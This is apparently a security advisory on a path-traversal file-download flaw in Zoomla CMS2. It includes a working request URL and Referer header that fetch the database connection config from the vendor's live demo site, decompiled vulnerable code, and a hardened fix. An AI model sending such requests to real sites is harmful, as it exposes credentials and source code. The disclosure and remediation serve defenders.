### Brief description:
Currently I have tried it on the latest Zoomla CMS2 x2.0 and it works, and the official DEMO site works as well.
### Detailed description:
Config/ConnectionStrings.config is the database connection file. Of course, the entire site can be downloaded this way; just swap in a different path.
```
http://demo.zoomla.cn/user/iServer/FiServerInfo.aspx?menu=filedown&filepath=//Config//ConnectionStrings.config
```
Referer header (the request must carry this, otherwise the handler will not treat it as coming from the file manager page):
```
http://demo.zoomla.cn/user/iServer/FiServer.aspx
```
[![zoomla.PNG](https://images.seebug.org/upload/201408/0415222836808150d9ff4239e8aeccda57069917.png)](https://images.seebug.org/upload/201408/0415222836808150d9ff4239e8aeccda57069917.png)
### Proof of vulnerability:
The Page_Load function behind FiServerInfo.aspx never validates that the requested `filepath` stays within an allowed directory, so any file under the web root can be downloaded. Note that the path is passed straight to `Server.MapPath`, which resolves it relative to the site root (or, for a leading `/`, from the application root), so `//Config//ConnectionStrings.config` maps directly onto the configuration file.
```
// Decompiled from FiServerInfo.aspx.cs (vulnerable as shipped).
protected void Page_Load(object sender, EventArgs e)
{
    if (!string.IsNullOrEmpty(base.Request.QueryString["menu"]) && (base.Request.QueryString["menu"] == "filedown"))
    {
        // Attacker-controlled path taken verbatim from the query string.
        string path = base.Request.QueryString["filepath"];
        if (path != "")
        {
            // MapPath resolves the path against the site root; nothing checks that
            // the result lies inside the upload directory, so "../" or an absolute
            // "/Config/..." path reaches any file the worker process can read.
            FileInfo info = new FileInfo(base.Server.MapPath(path));
            if (info.Exists)
            {
                base.Response.Clear();
                base.Response.AddHeader("Content-Disposition", "attachment; filename=" + base.Server.UrlEncode(info.Name));
                base.Response.AddHeader("Content-Length", info.Length.ToString());
                base.Response.ContentType = "application/octet-stream";
                base.Response.Filter.Close();
                // The raw file contents are streamed back without any type restriction.
                base.Response.WriteFile(info.FullName);
                base.Response.End();
            }
            else
            {
                base.Response.Write("<script>alert('The file does not exist!');history.go(-1);</script>");
            }
        }
    }
    if (!base.IsPostBack)
    {
        int questionId = DataConverter.CLng(base.Request.QueryString["QuestionId"]);
        this.MyBind(questionId);
        // The page already knows the permitted upload extensions, but never applies them to downloads.
        this.spfiletype.InnerHtml = SiteConfig.SiteOption.UploadFileExts;
    }
}
```
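For comparison, here is a hardened version of the download branch. This is an added example written for this write-up, not Zoomla's code or a vendor patch. It assumes (hypothetically) that user-uploaded files live under `~/UploadFiles/` and that `SiteConfig.SiteOption.UploadFileExts` is a `|`-separated extension list, as the page displays it; both names and the `/user/` area's existing login check are assumptions. The fix resolves the requested path relative to a fixed root, canonicalises it with `Path.GetFullPath`, and refuses anything that escapes that root or carries an extension outside the allow-list.

```csharp
// Added example: hardened download branch for FiServerInfo.aspx (not the vendor's code).
using System;
using System.IO;
using System.Linq;
using System.Web;
using System.Web.UI;

public partial class FiServerInfo : Page
{
    // Assumption: the only directory downloads may be served from.
    private const string DownloadRoot = "~/UploadFiles/";

    protected void Page_Load(object sender, EventArgs e)
    {
        if (Request.QueryString["menu"] == "filedown")
        {
            string safePath = ResolveDownloadPath(Request.QueryString["filepath"]);
            if (safePath == null)
            {
                // Refuse rather than echo the path back; do not hint whether the file exists.
                Response.StatusCode = 403;
                Response.End();
                return;
            }

            FileInfo info = new FileInfo(safePath);
            Response.Clear();
            Response.ContentType = "application/octet-stream";
            Response.AddHeader("Content-Disposition",
                "attachment; filename=" + HttpUtility.UrlEncode(info.Name));
            Response.AddHeader("Content-Length", info.Length.ToString());
            Response.TransmitFile(info.FullName);
            Response.End();
        }
    }

    // Returns the absolute path of the requested file if, and only if, it lies
    // inside DownloadRoot, has a permitted extension and exists; otherwise null.
    internal static string ResolveDownloadPath(string requested)
    {
        if (string.IsNullOrWhiteSpace(requested) || requested.IndexOf('\0') >= 0)
            return null;

        // Canonical root with a trailing separator so "UploadFiles2" cannot pass the prefix test.
        string root = Path.GetFullPath(HttpContext.Current.Server.MapPath(DownloadRoot));
        if (!root.EndsWith(Path.DirectorySeparatorChar.ToString()))
            root += Path.DirectorySeparatorChar;

        // Strip leading slashes so the value is always combined *under* the root,
        // then let GetFullPath collapse any "..", "." or duplicate separators.
        string relative = requested.TrimStart('/', '\\');
        string full = Path.GetFullPath(Path.Combine(root, relative));
        if (!full.StartsWith(root, StringComparison.OrdinalIgnoreCase))
            return null; // traversal or absolute path outside the upload directory

        // Assumption: UploadFileExts looks like "jpg|png|zip|doc".
        string ext = Path.GetExtension(full).TrimStart('.');
        string[] allowed = (SiteConfig.SiteOption.UploadFileExts ?? "")
            .Split(new[] { '|' }, StringSplitOptions.RemoveEmptyEntries);
        if (ext.Length == 0 || !allowed.Contains(ext, StringComparer.OrdinalIgnoreCase))
            return null; // .config, .cs, .dll etc. are never served

        return File.Exists(full) ? full : null;
    }
}
```

With this in place the original request resolves `//Config//ConnectionStrings.config` to `<site>/UploadFiles/Config/ConnectionStrings.config`, which fails both the existence check and the extension allow-list, and any `../` that climbs above `UploadFiles` fails the prefix test. If uploads are per-user, the ownership of the file should additionally be checked against the logged-in account before serving it.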